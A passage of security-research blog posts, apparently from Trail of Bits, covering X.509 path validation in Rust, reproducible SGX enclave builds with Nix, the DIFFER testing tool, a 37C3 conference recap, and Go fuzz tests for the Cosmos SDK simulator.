  • The specifications often mandate surprising behavior that (virtually) no client implements correctly. RFC 5280, for example, stipulates that path length and name constraints do not apply to self-issued intermediates, but this is widely ignored in practice.
  • Because the specifications themselves are so infrequently interpreted, they contain still-unresolved ambiguities: treating roots as “trust anchors” versus policy-bearing certificates, handling of serial numbers that are 20 bytes long but DER-encoded with 21 bytes, and so forth.

Our implementation needed to handle each of these families of quirks. To do so consistently, we leaned on three basic strategies:

  • Test first, then implement: To give ourselves confidence in our designs, we built x509-limbo and pre-validated it against other implementations. This gave us both a coverage baseline for our own implementation, and empirical justification for relaxing various policy-level checks, where necessary.
  • Keep everything in Rust: Rust’s performance, strong type system and safety properties meant that we could make rapid iterations to our design while focusing on algorithmic correctness rather than memory safety. It certainly didn’t hurt that PyCA Cryptography’s X.509 parsing is already done in Rust, of course.
  • Obey Sleevi’s Laws: Our implementation treats path construction and path validation as a single unified step with no “one” true chain, meaning that the entire graph is always searched before giving up and returning a failure to the user.
  • Compromise where necessary: As mentioned above, implementations frequently maintain compatibility with OpenSSL, even where doing so violates the profiles defined in RFC 5280 and the CABF BRs. This situation has improved dramatically over the years (and improvements have accelerated in pace, as certificate issuance periods have shortened on the Web PKI), but some compromises are still necessary.

Looking forward

Our initial implementation is production-ready, and comes in at around 2,500 lines of Rust, not counting the relatively small Python-only API surfaces or x509-limbo:

From here, there’s much that could be done. Some ideas we have include:

  • Expose APIs for client certificate path validation. To expedite things, we’ve focused the initial implementation on server validation (verifying that a leaf certificate attesting to a specific DNS name or IP address chains up to a root of trust). This ignores client validation, wherein the client side of a connection presents its own certificate for the server to verify against a set of known principals. Client path validation shares the same fundamental chain building algorithm as server validation, but has a slightly different ideal public API (since the client’s identity needs to be matched against a potentially arbitrary number of identities known to the server).
  • Expose different X.509 profiles (and more configuration knobs). The current APIs expose very little configuration; the only things a user of the Python API can change are the certificate subject, the validation time, and the maximum chain depth. Going forward, we’ll look into exposing additional knobs, including pieces of state that will allow users to perform verifications with the RFC 5280 certificate profile and other common profiles (like Microsoft’s Authenticode profile). Long term, this will help bespoke (such as corporate) PKI use cases to migrate to Cryptography’s X.509 APIs and lessen their dependency on OpenSSL.
  • Carcinize existing C and C++ X.509 users. One of Rust’s greatest strengths is its native, zero-cost compatibility with C and C++. Given that C and C++ implementations of X.509 and path validation have historically been significant sources of exploitable memory corruption bugs, we believe that a thin “native” wrapper around cryptography-x509-verification could have an outsized positive impact on the security of major C and C++ codebases.
  • Spread the gospel of x509-limbo. x509-limbo was an instrumental component in our ability to confidently ship an X.509 path validator. We’ve written it in such a way that should make integration into other path validation implementations as simple as downloading and consuming a single JSON file. We look forward to helping other implementations (such as rustls-webpki) integrate it directly into their own testing regimens!

If any of these ideas interests you (or you have any of your own), please get in touch! Open source is key to our mission at Trail of Bits, and we’d love to hear about how we can help you and your team take the fullest advantage of and further secure the open-source ecosystem.

Acknowledgments

This work required the coordination of multiple independent parties. We would like to express our sincere gratitude to each of the following groups and individuals:

  • The Sovereign Tech Fund, whose vision for OSS security and funding made this work possible.
  • The PyCA Cryptography maintainers (Paul Kehrer and Alex Gaynor), who scoped this work from the very beginning and offered constant feedback and review throughout the development process.
  • The BetterTLS development team, who both reviewed and merged patches that enabled x509-limbo to vendor and reuse their (extensive) testsuite.

Enhancing trust for SGX enclaves

26 January 2024 at 14:00

By Artur Cygan

Creating reproducible builds for SGX enclaves used in privacy-oriented deployments is a difficult task that lacks a convenient and robust solution. We propose using Nix to achieve reproducible and transparent enclave builds so that anyone can audit whether the enclave is running the source code it claims, thereby enhancing the security of SGX systems.

In this blog post, we will explain how we enhanced trust for SGX enclaves through the following steps:

  • Analyzed reproducible builds of Signal and MobileCoin enclaves
  • Analyzed a reproducible SGX SDK build from Intel
  • Packaged the SGX SDK in Nixpkgs
  • Prepared a reproducible-sgx repository demonstrating how to build SGX enclaves with Nix

Background

Introduced in 2015, Intel SGX is an implementation of confidential (or trusted) computing. More specifically, it is a trusted execution environment (TEE) that allows users to run confidential computations on a remote computer owned and maintained by an untrusted party. Users trust the manufacturer (Intel, in this case) of a piece of hardware (CPU) to protect the execution environment from tampering, even by the highest privilege–level code, such as kernel malware. SGX code and data live in special encrypted and authenticated memory areas called enclaves.

During my work at Trail of Bits, I observed a poorly addressed trust gap in systems that use SGX, where the user of an enclave doesn’t necessarily trust the enclave author. Instead, the user is free to audit the enclave’s open-source code to verify its functionality and security. This setting can be observed, for instance, in privacy-oriented deployments such as Signal’s contact discovery service or MobileCoin’s consensus protocol. To validate trust, the user must check whether the enclave was built from trusted code. Unfortunately, this turns out to be a difficult task because the builds tend to be difficult to reproduce and rely on a substantial amount of precompiled binary code. In practice, hardly anyone verifies the builds and has no option but to trust the enclave author.

To give another perspective—a similar situation happens in the blockchain world, where smart contracts are deployed as bytecode. For instance, Etherscan will try to reproduce on-chain EVM bytecode to attest that it was compiled from the claimed Solidity source code. Users are free to perform the same operation if they don’t trust Etherscan.

A solution to this problem is to build SGX enclaves in a reproducible and transparent way so that multiple parties can independently arrive at the same result and audit the build for any supply chain–related issues. To achieve this goal, I helped port Intel’s SGX SDK to Nixpkgs, which allows building SGX enclaves with the Nix package manager in a fully reproducible way so any user can verify that the build is based on trusted code.

To see how reproducible builds complete the trust chain, it is important to first understand what guarantees SGX provides.

How does an enclave prove its identity?

Apart from the above mentioned TEE protection (nothing leaks out and execution can’t be altered), SGX can remotely prove the enclave’s identity, including its code hash, signature, and runtime configuration. This feature is called remote attestation and can be a bit foreign for someone unfamiliar with this type of technology.

When an enclave is loaded, its initial state (including code) is hashed by the CPU into a measurement hash, also known as MRENCLAVE. The hash changes only if the enclave’s code changes. This hash, along with other data such as the signer and environment details, is placed in a special memory area accessible only to the SGX implementation. The enclave can ask the CPU to produce a report containing all this data, including a piece of enclave-defined data (called report_data),and then passes it to the special Intel-signed quoting enclave to sign the report (called a quote from now on) so that it can be delivered to the remote party and verified.

Next, the verifier checks the quote’s authenticity with Intel and the relevant information from the quote. Although there are a few additional checks and steps at this point, in our case, the most important thing to check is the measurement hash, which is a key component of trust verification.

What do we verify the hash against? The simplest solution is to hard code a trusted MRENCLAVE value into the client application itself. This solution is used, for instance, by Signal, where MRENCLAVE is placed in the client’s build config and verified against the hash from the signed quote sent by the Signal server. Bundling the client and MRENCLAVE makes sense; after all, we need to audit and trust the client application code too. The downside is that the client application has to be rebuilt and re-released when the enclave code changes. If the enclave modifications are expected to be frequent or if it is important to quickly move clients to another enclave—for instance, in the event of a security issue—clients can use a more dynamic approach and fetch MRENCLAVE values from trusted third parties.

Secure communication channel

SGX can prove the identity of an enclave and a piece of report_data that was produced by it, but it’s up to the enclave and verifier to establish a trusted and secure communication channel. Since SGX enclaves are flexible and can freely communicate with the outside world over the network through ECALLS and OCALLs, SGX itself doesn’t impose any specific protocol or implementation for the channel. The enclave developer is free to decide, as long as the channel is encrypted, is authenticated, and terminates inside the enclave.

For instance, the SGX SDK implements an example of an authenticated key exchange scheme for remote attestation. However, the scheme assumes a DRM-like system where the enclave’s signer is trusted and the server’s public key is hard coded in the enclave’s code, so it’s unsuitable for use in a privacy-oriented deployment of SGX such as Signal.

If we don’t trust the enclave’s author, we can leverage the report_data to establish such a channel. This is where the SGX guarantees essentially end, and from now on, we have to trust the enclave’s source code to do the right thing. This fact is not obvious at first but becomes evident if we look, for instance, at the RA-TLS paper on how to establish a secure TLS channel that terminates inside an enclave:

The enclave generates a new public-private RA-TLS key pair at every startup. The RA-TLS key need not be persisted since generating a fresh key on startup is reasonably cheap. Not persisting the key reduces the key’s exposure and avoids common problems related to persistence such as state rollback protection. Interested parties can inspect the source code to convince themselves that the key is never exposed outside of the enclave.

To maintain the trust chain, RA-TLS uses the report_data from the quote that commits to the enclave’s public key hash. A similar method can be observed in the Signal protocol implementing Noise Pipes and committing to the handshake hash in the report_data.

SGX encrypts and authenticates the enclave’s memory, but it’s up to the code running in the enclave to protect the data. Nothing stops the enclave code from disclosing any information to the outside world. If we don’t know what code runs in the enclave, anything can happen.

Fortunately, we know the code because it’s open source, but how do we make sure that the code at a particular Git commit maps to the MRENCLAVE hash an enclave is presenting? We have to reproduce the enclave build, calculate its MRENCLAVE hash, and compare it with the hash obtained from the quote. If the build can’t be reproduced, our remaining options are either to trust someone who confirmed the enclave is safe to use or to audit the enclave’s binary code.

Why are reproducible builds hard?

The reproducibility type we care about is bit-for-bit reproducibility. Some software might be semantically identical despite minor differences in their artifacts. SGX enclaves are built into .dll or .so files using the SGX SDK and must be signed with the author’s RSA key. Since we calculate hashes of artifacts, even a one-bit difference will produce a different hash. We might get away with minor differences, as the measurement process omits some details from the enclave executable file (such as the signer), but having full file reproducibility is desirable. This is a non-trivial task and can be implemented in multiple ways.

Both Signal and MobileCoin treat this task seriously and aim to provide a reproducible build for their enclaves. For example, Signal claims the following:

The enclave code builds reproducibly, so anyone can verify that the published source code corresponds to the MRENCLAVE value of the remote enclave.

The initial version of Signal’s contact discovery service build (archived early 2023) is based on Debian and uses a .buildinfo file to lock down the system dependencies; however, locking is done based on versions rather than hashes. This is a limitation of Debian, as we read on the BuildinfoFiles page. The SGX SDK and a few other software packages are built from sources fetched without checking the hash of downloaded data. While those are not necessarily red flags, more trust than necessary is placed in third parties (Debian and GitHub).

From the README, it is unclear how the .buildinfo file is produced because there is no source for the mentioned derebuild.pl script. Most likely, the .buildinfo file is generated during the original build of the enclave’s Debian package and checked into the repository. It is unclear whether this mechanism guarantees capture of all the build inputs and doesn’t let any implicit dependencies fall through the cracks. Unfortunately, I couldn’t reproduce the build because both the Docker and Debian instructions from the README failed, and shortly after that, I noticed that Signal moved to a new iteration of the contact discovery service.

The current version of Signal’s contact discovery service build is slightly different. Although I didn’t test the build, it’s based on a Docker image that suffers from similar issues such as installing dependencies from a system package manager with network access, which doesn’t guarantee reproducibility.

Another example is MobileCoin, which provides a prebuilt Docker image with a build environment for the enclave. Building the same image from Dockerfile most likely won’t result in a reproducible hash we can validate, so the image provided by MobileCoin must be used to reproduce the enclave. The problem here is that it’s quite difficult to audit Docker images that are hundreds of megabytes large, and we essentially need to trust MobileCoin that the image is safe.

Docker is a popular choice for reproducing environments, but it doesn’t come with any tools to support bit-for-bit reproducibility and instead focuses on delivering functionally similar environments. A complex Docker image might reproduce the build for a limited time, but the builds will inevitably diverge, if no special care is taken, due to filesystem timestamps, randomness, and unrestricted network access.

Why Nix can do it better

Nix is a cross-platform source-based package manager that features the Nix language to describe packages and a large collection of community-maintained packages called Nixpkgs. NixOS is a Linux distribution built on top of Nix and Nixpkgs, and is designed from the ground up to focus on reproducibility. It is very different from the conventional package managers. For instance, it doesn’t install anything into regular system paths like /bin or /usr/lib. Instead, it uses its own /nix/store directory and symlinks to the packages installed there. Every package is prefixed with a hash capturing all the build inputs like dependency graph or compilation options. This means that it is possible to have the same package installed in multiple variants differing only by build options; from Nix’s perspective, it is a different package.

Nix does a great job at surfacing most of the issues that could render the build unreproducible. For example, a Nix build will most likely break during development when an impurity (i.e., a dependency that is not explicitly declared as input to the build) is encountered, forcing the developer to fix it. Impurities are often captured from the environment, which includes environment variables or hard-coded system-wide directories like /usr/lib. Nix aims to address all those issues by sandboxing the builds and fixing the filesystem timestamps. Nix also requires all inputs that are fetched from the network to be pinned. On top of that, Nixpkgs contain many patches (gnumake, for instance) to fix reproducibility issues in common software such as compilers or build systems.

Reducing impurities increases the chance of build reproducibility, which in turn increases the trust in source-to-artifact correspondence. However, ultimately, reproducibility is not something that can be proven or guaranteed. Under the hood, a typical Nix build runs compilers that could rely on some source of randomness that could leak into the compiled artifacts. Ideally, reproducibility should be tracked on an ongoing basis. An example of such a setup is the r13y.com site, which tracks reproducibility of the NixOS image itself.

Apart from strong reproducibility properties, Nix also shines when it comes to dependency transparency. While Nix caches the build outputs by default, every package can be built from source, and the dependency graph is rooted in an easily auditable stage0 bootstrap, which reduces trust in precompiled binary code to the minimum.

Issues in Intel’s use of Nix

Remember the quoting enclave that signs attestation reports? To deliver all SGX features, Intel needed to create a set of privileged architectural enclaves, signed by Intel, that perform tasks too complex to implement in CPU microcode. The quoting enclave is one of them. These enclaves are a critical piece of SGX because they have access to hardware keys burned into the CPU and perform trusted tasks such as remote attestation. However, a bug in the quoting enclave’s code could invalidate the security guarantees of the whole remote attestation protocol.

Being aware of that, Intel prepared a reproducible Nix-based build that builds SGX SDK (required to build any enclave) and all architectural enclaves. The solution uses Nix inside a Docker container. I was able to reproduce the build, but after a closer examination, I identified a number of issues with it.

First, the build doesn’t pin the Docker image or the SDK source hashes. The SDK can be built from source, but the architectural enclaves build downloads a precompiled SDK installer from Intel and doesn’t even check the hash. Although Nix is used, there are many steps that happen outside the Nix build.

The Nix part of the build is unfortunately incorrect and doesn’t deliver much value. The dependencies are hand picked from the prebuilt cache, which circumvents the build transparency Nix provides. The build runs in a nix-shell that should be used only for development purposes. The shell doesn’t provide the same sandboxing features as the regular Nix build and allows different kinds of impurities. In fact, I discovered some impurities when porting the SDK build to Nixpkgs. Some of those issues were also noticed by another researcher but remain unaddressed.

Bringing SGX SDK to Nixpkgs

I concluded that the SGX SDK should belong to Nixpkgs to achieve truly reproducible and transparent enclave builds. It turned out there was already an ongoing effort, which I joined and helped finish. The work has been expanded and maintained by the community since then. Now, any SGX enclave can be easily built with Nix by using the sgx-sdk package. I hope that once this solution matures, Nixpkgs maintainers can maintain it together with Intel and bring it into the official SGX SDK repository.

We prepared the reproducible-sgx GitHub repository to show how to build Intel’s sample enclaves with Nix and the ported SDK. While this shows the basics, SGX enclaves can be almost arbitrarily complex and use different libraries and programming languages. If you wish to see another example, feel free to open an issue or a pull request.

In this blog post, we discussed only a slice of the possible security issues concerning SGX enclaves. For example, numerous security side-channel attacks have been demonstrated on SGX, such as the recent attack on Blu-ray DRM. If you need help with security of a system that uses SGX or Nix, don’t hesitate to contact us.

Resources

Introducing DIFFER, a new tool for testing and validating transformed programs

31 January 2024 at 14:30

By Michael Brown

We recently released a new differential testing tool, called DIFFER, for finding bugs and soundness violations in transformed programs. DIFFER combines elements from differential, regression, and fuzz testing to help users find bugs in programs that have been altered by software rewriting, debloating, and hardening tools. We used DIFFER to evaluate 10 software debloating tools, and it discovered debloating failures or soundness violations in 71% of the transformed programs produced by these tools.

DIFFER fills a critical need in post-transformation software validation. Program transformation tools usually leave this task entirely to users, who typically have few (if any) tools beyond regression testing via existing unit/integration tests and fuzzers. These approaches do not naturally support testing transformed programs against their original versions, which can allow subtle and novel bugs to find their way into the modified programs.

We’ll provide some background research that motivated us to create DIFFER, describe how it works in more detail, and discuss its future.

If you prefer to go straight to the code, check out DIFFER on GitHub.

Background

Software transformation has been a hot research area over the past decade and has primarily been motivated by the need to secure legacy software. In many cases, this must be done without the software’s source code (binary only) because it has been lost, is vendor-locked, or cannot be rebuilt due to an obsolete build chain. Among the more popular research topics that have emerged in this area are binary lifting, recompiling, rewriting, patching, hardening, and debloating.

While tools built to accomplish these goals have demonstrated some successes, they carry significant risks. When compilers lower source code to binaries, they discard contextual information once it is no longer needed. Once a program has been lowered to binary, the contextual information necessary to safely modify the original program generally cannot be fully recovered. As a result, tools that modify program binaries directly may inadvertently break them and introduce new bugs and vulnerabilities.

While DIFFER is application-agnostic, we originally built this tool to help us find bugs in programs that have had unnecessary features removed with a debloating tool (e.g., Carve, Trimmer, Razor). In general, software debloaters try to minimize a program’s attack surface by removing unnecessary code that may contain latent vulnerabilities or be reused by an attacker using code-reuse exploit patterns. Debloating tools typically perform an analysis pass over the program to map features to the code necessary to execute them. These mappings are then used to cut code that corresponds to features the user doesn’t want. However, these cuts will likely be imprecise because generating the mappings relies on imprecise analysis steps like binary recovery. As a result, new bugs and vulnerabilities can be introduced into debloated programs during cutting, which is exactly what we have designed DIFFER to detect.

How does DIFFER work?

At a high level, DIFFER (shown in figure 1) is used to test an unmodified version of the program against one or more modified variants of the program. DIFFER allows users to specify seed inputs that correspond to both unmodified and modified program behaviors and features. It then runs the original program and the transformed variants with these inputs and compares the outputs. Additionally, DIFFER supports template-based mutation fuzzing of these seed inputs. By providing mutation templates, DIFFER can maximize its coverage of the input space and avoid missing bugs (i.e., false negatives).

DIFFER expects to see the same outputs for the original and variant programs when given inputs that correspond to unmodified features. Conversely, it expects to see different outputs when it executes the programs with inputs corresponding to modified features. If DIFFER detects unexpected matching, differing, or crashing outputs, it reports them to the user. These reports help the user identify errors in the modified program resulting from the transformation process or its configuration.

Figure 1: Overview of DIFFER

When configuring DIFFER, the user selects one or more comparators to use when comparing outputs. While DIFFER provides many built-in comparators that check basic outputs such as return codes, console text, and output files, more advanced comparators are often needed. For this purpose, DIFFER allows users to add custom comparators for complex outputs like packet captures. Custom comparators are also useful for reducing false-positive reports by defining allowable differences in outputs (such as timestamps in console output). Our open-source release of DIFFER contains many useful comparator implementations to help users easily write their own comparators.

However, DIFFER does not and cannot provide formal guarantees of soundness in transformation tools or the modified programs they produce. Like other dynamic analysis testing approaches, DIFFER cannot exhaustively test the input space for complex programs in the general case.

Use case: evaluating software debloaters

In a recent research study we conducted in collaboration with our friends at GrammaTech, we used DIFFER to evaluate debloated programs created by 10 different software debloating tools. We used these tools to remove unnecessary features from 20 different programs of varying size, complexity, and purpose. Collectively, the tools created 90 debloated variant programs that we then validated with DIFFER. DIFFER discovered that 39 (~43%) of these variants still had features that debloating tools failed to remove. Even worse, DIFFER found that 25 (~28%) of the variants either crashed or produced incorrect outputs in retained features after debloating.

By discovering these failures, DIFFER has proven itself as a useful post-transformation validation tool. Although this study was focused on debloating transformations, we want to emphasize that DIFFER is general enough to test other transformation tools such as those used for software hardening (e.g., CFI, stack protections), translation (e.g., C-to-Rust transformers), and surrogacy (e.g., ML surrogate generators).

What’s next?

With DIFFER now available as open-source software, we invite the security research community to use, extend, and help maintain DIFFER via pull requests. We have several specific improvements planned as we continue to research and develop DIFFER, including the following:

  • Support running binaries in Docker containers to reduce environmental burdens.
  • Add new built-in comparators.
  • Add support for targets that require superuser privileges.
  • Support monitoring multiple processes that make up distributed systems.
  • Add runtime comparators (via instrumentation, etc.) for “deep” equivalence checks.

Acknowledgements

This material is based on work supported by the Office of Naval Research (ONR) under Contract No. N00014-21-C-1032. Any opinions, findings and conclusions, or recommendations expressed in this material are those of the author and do not necessarily reflect the views of the ONR.

Chaos Communication Congress (37C3) recap

2 February 2024 at 14:00

Last month, two of our engineers attended the 37th Chaos Communication Congress (37C3) in Hamburg, joining thousands of hackers who gather each year to exchange the latest research and achievements in technology and security. Unlike other tech conferences, this annual gathering focuses on the interaction of technology and society, covering such topics as politics, entertainment, art, sustainability—and, most importantly, security. At the first Congress in the 80s, hackers showcased weaknesses in banking applications over the German BTX system; this year’s theme, “Unlocked,” highlighted breaking technological barriers and exploring new frontiers in digital rights and privacy.

In this blog post, we will review our contributions to the 37C3—spanning binary exploitation and analysis and fuzzing—before highlighting several talks we attended that we recommend listening to.

PWNing meetups

Trail of Bits engineer Dominik Czarnota self-organized two sessions about PWNing, also known as binary exploitation. These meetups showcased Pwndbg and Pwntools, popular tools used during CTF competitions, reverse engineering, and vulnerability research work.

At the first session, Dominik presented Pwndbg, a plugin for GDB that enhances the debugging of low-level code by displaying useful context on each program stop. This context includes the state of the debugged program (its registers, executable code, and stack memory) and dereferenced pointers, which help the user understand the program’s behavior. The presentation showed some of Pwndbg’s features and commands, such as listing memory mappings (vmmap), displaying process information (procinfo), searching memory (search), finding pointers to specific memory mappings (p2p), identifying stack canary values (canary), and controlling the process execution (nextsyscall, stepuntilasm etc.). The presentation concluded with a release of Pwndbg cheatsheets and details on upcoming features, such as tracking GOT function executions and glibc heap use-after-free analysis. These features have been developed as part of Trail of Bits’s winternship program, now in its thirteenth year of welcoming interns who spend time working and doing research on industry’s most challenging problems.



At the second session, Arusekk and Peace-Maker showcased advanced features of Pwntools, a Swiss-army Python library useful for exploit development. They demonstrated expert methods for receiving and sending data (e.g., io.recvregex or io.recvpred); command-line tricks when running exploit scripts (cool environment variables or arguments like DEBUG, NOASLR, or LOG_FILE that set certain config options); and other neat features like libcdb command-line tool, the shellcraft module, and the ROP (return oriented programming) helper. For those who missed it, the slides can be found here.

Next generation fuzzing

In Fuzz Everything, Everywhere, All at Once, the AFL++ and LibAFL team showcased new features in the LibAFL fuzzer. They presented QEMU-based instrumentation to fuzz binary-only targets and used QEMU hooks to enable sanitizers that help find bugs. In addition to QASan—the team’s QEMU-based AddressSanitizer implementation—the team developed an injection sanitizer that goes beyond finding just memory corruption bugs. Using QEMU hooks, SQL, LDAP, XSS or OS command injections can be detected by defining certain rules in a TOML configuration file. Examination of the config file suggests it should be easily extensible to other injections; we just need to know which functions to hook and which payloads to look for.

Although memory corruption bugs will decline with the deployment of memory-safe languages like Rust, fuzzing will continue to play an important role in uncovering other bug classes like injections or logic bugs, so it’s great to see new tools created to detect them.

This presentation’s Q&A session reminded us that oss-fuzz already has a SystemSanitizer that leverages the ptrace syscall, which helped to find a command injection vulnerability in the past.

In the past, Trail of Bits has used LibAFL in our collaboration with Inria on an academic research project called tlspuffin. The goal of the project was to fuzz various TLS implementations, which uncovered several bugs in wolfSSL.

Side channels everywhere

In a talk titled Full AACSess: Exposing and exploiting AACSv2 UHD DRM for your viewing pleasure, Adam Batori presented a concept for side-channel attacks on Intel SGX. Since Trail of Bits frequently conducts audits on projects that use trusted execution environments like Intel SGX (e.g., Mobilecoin), this presentation was particularly intriguing to us.

After providing an overview of the history of DRM for physical media, Adam went into detail on how the team of researchers behind sgx.fail extracted cryptographic key material from the SGX enclave to break DRM on UHD Blu-ray disks to prove the feasibility of real-world side-channel attacks on secure enclaves. Along the way, he discussed many technological features of SGX along the way.

The work and talk prompted discussion about Intel’s decision to discontinue SGX on consumer hardware. Due to the high risk of side channels on low-cost consumer devices, we believe that using Intel SGX for DRM purposes is already dead on arrival. Side-channel attacks are just one example of the often-overlooked challenges that accompany the secure use of enclaves to protect data.

New challenges: Reverse-engineering Rust

Trail of Bits engineers frequently audit software written in Rust. In Rust Binary Analysis, Feature by Feature, Ben Herzog discussed the compilation output of the Rust compiler. Understanding how Rust builds binaries is important, for example, to optimize Rust programs or to understand the interaction between safe and unsafe Rust code. The talk focused on the debug compilation mode to showcase how the Rust compiler generates code for iterating over ranges and uses iterators or optimizes the layout of Rust enums. The presenter also noted that strings in Rust are not null-terminated, which can cause some reverse-engineering tools like Ghidra to produce hard-to-understand output.

The talk author posed four questions that should be answered when encountering function calls related to traits:

  • What is the name of the function being called (e.g., next)?
  • On what type is the function defined (e.g., Values<String, Person>)?
  • Which type is returned from the function (e.g., Option)?
  • What trait is the function part of (e.g., Iterator<Type=Person>)?

More details can be found in the blog post by Ben Herzog.

Proprietary cryptography is considered harmful

Under TETRA:BURST, researchers disclosed multiple vulnerabilities in the TETRA radio protocol. The protocol is used by government agencies, police, military, and critical infrastructure across Europe and other areas.
It is striking how proprietary cryptography is still the default in some industries. Hiding the specification from security researchers by requiring them to sign an NDA greatly limits a system’s reviewability.

Due to export controls, several classes of algorithms exist in TETRA. One of the older ones, TEA1, is still actively deployed today but uses a key length of only 32 bits. Even though the specifiers no longer recommend using it, it is still actively being used in the field, which is especially problematic given that these weak protocols are counted upon to protect critical infrastructure.

The researchers demonstrated the exploitability of the vulnerabilities by acquiring radio hardware from online resellers.

Are you sure you own your train? Do you own your car?

In Breaking “DRM” in Polish trains, researchers reported the challenges they encountered after they were recruited by an independent train repair company to determine why some trains no longer operated after being serviced.
Using reverse engineering, the researchers uncovered several anti-features in the trains that made them stop working in various situations (e.g., after they didn’t move for a certain time or when they were located at GPS locations of competitor’s service shops). The talk covers interesting technical details about train software and how the researchers reverse-engineered the firmware, and it questions the extent to which users should have control over the vehicles or devices they own.

What can we learn from hackers as developers and auditors?

Hackers possess a unique problem-solving mindset, showing developers and auditors the importance of creative and unconventional thinking in cybersecurity. The event highlighted the necessity of securing systems correctly, and starting with a well understood threat model. Incorrect or proprietary approaches that rely on obfuscation do not adequately protect the end products. Controls such as hiding cryptographic primitives behind an NDA only obfuscate how the protocol works; they do not make the system more secure, and they make security researchers’ jobs harder.

Emphasizing continuous learning, the congress demonstrated the ever-evolving nature of cybersecurity, urging professionals to stay abreast of the latest threats and technologies. Ethical considerations were a focal point, stressing the responsibility of developers and auditors to respect user privacy and data security in their work.

The collaborative spirit of the hacker community, as seen at 37C3, serves as a model for open communication and mutual learning within the tech industry. At Trail of Bits, we are committed to demonstrating these values by sharing knowledge publicly through publishing blog posts like this one, resources like the Testing Handbook that help developers secure their code, and documentation about our research into zero-knowledge proofs.

Closing words

We highly recommend attending 37C3 in person, even though the date is unfortunately timed between Christmas and New Years, and most talks are live-streamed and available online. The congress includes many self-organized sessions, workshops, and assemblies, making it especially helpful for security researchers. We had initially planned to disclose our recently published LeftoverLocals bug, a vulnerability that affects notable GPU vendors like AMD, Qualcomm, and Apple, at 37C3, but we held off our release date to give GPU vendors more time to fix the bug. The bug disclosure was finally published on January 16; we may report our experience finding and disclosing the bug at the next year’s 38C3!

Improving the state of Cosmos fuzzing

5 February 2024 at 14:00

By Gustavo Grieco

Cosmos is a platform enabling the creation of blockchains in Go (or other languages). Its reference implementation, Cosmos SDK, leverages strong fuzz testing extensively, following two approaches: smart fuzzing for low-level code, and dumb fuzzing for high-level simulation.

In this blog post, we explain the differences between these approaches and show how we added smart fuzzing on top of the high-level simulation framework. As a bonus, our smart fuzzer integration led us to identify and fix three minor issues in Cosmos SDK.

Laying low

The first approach to Cosmos code fuzzing leverages well-known smart fuzzers such as AFL, go-fuzz, or Go native fuzzing for specific parts of the code. These tools rely on source code instrumentation to extract useful information to guide a fuzzing campaign. This is essential to explore the input space of a program efficiently.

Using fuzzing for low-level testing of Go functions in Cosmos SDK is very straightforward. First, we select a suitable target function, usually stateless code, such as testing the parsing of normalized coins:

func FuzzTypesParseCoin(f *testing.F) {
    f.Fuzz(func(t *testing.T, data []byte) {
        _, _ = types.ParseCoinNormalized(string(data))
    })
}

Figure 1: A small fuzz test for testing the parsing of normalized coins

Smart fuzzers can quickly find issues in stateless code like this; however, it is clear that the limitations of being applied only to low-level code will not help uncover more complex and interesting issues in the cosmos-sdk execution.

Moving up!

If we want to catch more interesting bugs, we need to go beyond low-level fuzz testing in Cosmos SDK. Fortunately, there is already a high-level approach for testing: this works from the top down, instead of the bottom up. Specifically, cosmos-sdk provides the Cosmos Blockchain Simulator, a high-level, end-to-end transaction fuzzer, to uncover issues in Cosmos applications.

This tool allows executing random operation transactions, starting either from a random genesis state or a predefined one. To get this tool to work, application developers must implement several important functions that will generate both a random genesis state and transactions. Fortunately for us, this is fully implemented for all the cosmos-sdk features.

For instance, to test the MsgSend operation from the x/nft module, the developers defined the SimulateMsgSend function to generate a random NFT transfer:

// SimulateMsgSend generates a MsgSend with random values.
func SimulateMsgSend(
        cdc *codec.ProtoCodec,
        ak nft.AccountKeeper,
        bk nft.BankKeeper,
        k keeper.Keeper,
) simtypes.Operation {
        return func(
                r *rand.Rand, app *baseapp.BaseApp, ctx sdk.Context, accs []simtypes.Account, chainID string,
        ) (simtypes.OperationMsg, []simtypes.FutureOperation, error) {
                sender, _ := simtypes.RandomAcc(r, accs)
                receiver, _ := simtypes.RandomAcc(r, accs)
                …

Figure 2: Header of the SimulateMsgSend function from the x/nft module

While the simulator can produce end-to-end execution of transaction sequences, there is an important difference with the use of smart fuzzers such as go-fuzz. When the simulator is invoked, it will use only a single source of randomness for producing values. This source is configured when the simulation starts:

func SimulateFromSeed(
        tb testing.TB,
        w io.Writer,
        app *baseapp.BaseApp,
        appStateFn simulation.AppStateFn,
        randAccFn simulation.RandomAccountFn,
        ops WeightedOperations,
        blockedAddrs map[string]bool,
        config simulation.Config,
        cdc codec.JSONCodec,
) (stopEarly bool, exportedParams Params, err error) {
        // in case we have to end early, don't os.Exit so that we can run cleanup code.
        testingMode, _, b := getTestingMode(tb)

        fmt.Fprintf(w, "Starting SimulateFromSeed with randomness created with seed %d\n", int(config.Seed))
        r := rand.New(rand.NewSource(config.Seed))
        params := RandomParams(r)
        …

Figure 3: Header of the SimulateFromSeed function

Since the simulation mode will only loop through a number of purely random transactions, it is pure random testing (also called dumb fuzzing).

Why don’t we have both?

It turns out, there is a simple way to combine these approaches, allowing the native Go fuzzing engine to randomly explore the cosmos-sdk genesis, the generation of transactions, and the block creation. The first step is to create a fuzz test that invokes the simulator. We based this code on the unit tests in the same file:

func FuzzFullAppSimulation(f *testing.F) {
    f.Fuzz(func(t *testing.T, input [] byte) {
       …
       config.ChainID = SimAppChainID

       appOptions := make(simtestutil.AppOptionsMap, 0)
       appOptions[flags.FlagHome] = DefaultNodeHome
       appOptions[server.FlagInvCheckPeriod] = simcli.FlagPeriodValue
        db := dbm.NewMemDB()
       logger := log.NewNopLogger()

       app := NewSimApp(logger, db, nil, true, appOptions, interBlockCacheOpt(), baseapp.SetChainID(SimAppChainID))
       require.Equal(t, "SimApp", app.Name())

       // run randomized simulation
       _,_, err := simulation.SimulateFromSeed(
               t,
               os.Stdout,
               app.BaseApp,
               simtestutil.AppStateFn(app.AppCodec(), app.SimulationManager(), app.DefaultGenesis()),
               simtypes.RandomAccounts,
               simtestutil.SimulationOperations(app, app.AppCodec(), config),
               BlockedAddresses(),
               config,
               app.AppCodec(),
       )

       if err != nil {
               panic(err)
       }
    })

Figure 4: Template of a Go fuzz test running a full simulation of cosmos-sdk

We still need a way to let the fuzzer control possible inputs. A simple approach would be to let the smart fuzzer directly control the seed of the random value generator:

func FuzzFullAppSimulation(f *testing.F) {
    f.Fuzz(func(t *testing.T, input [] byte) {
       config.Seed = IntFromBytes(input)
       …

Figure 5: A fuzz test that receives a single seed as input

func SimulateFromSeed(
        …
        config simulation.Config,
        … 
) (stopEarly bool, exportedParams Params, err error) {
        …
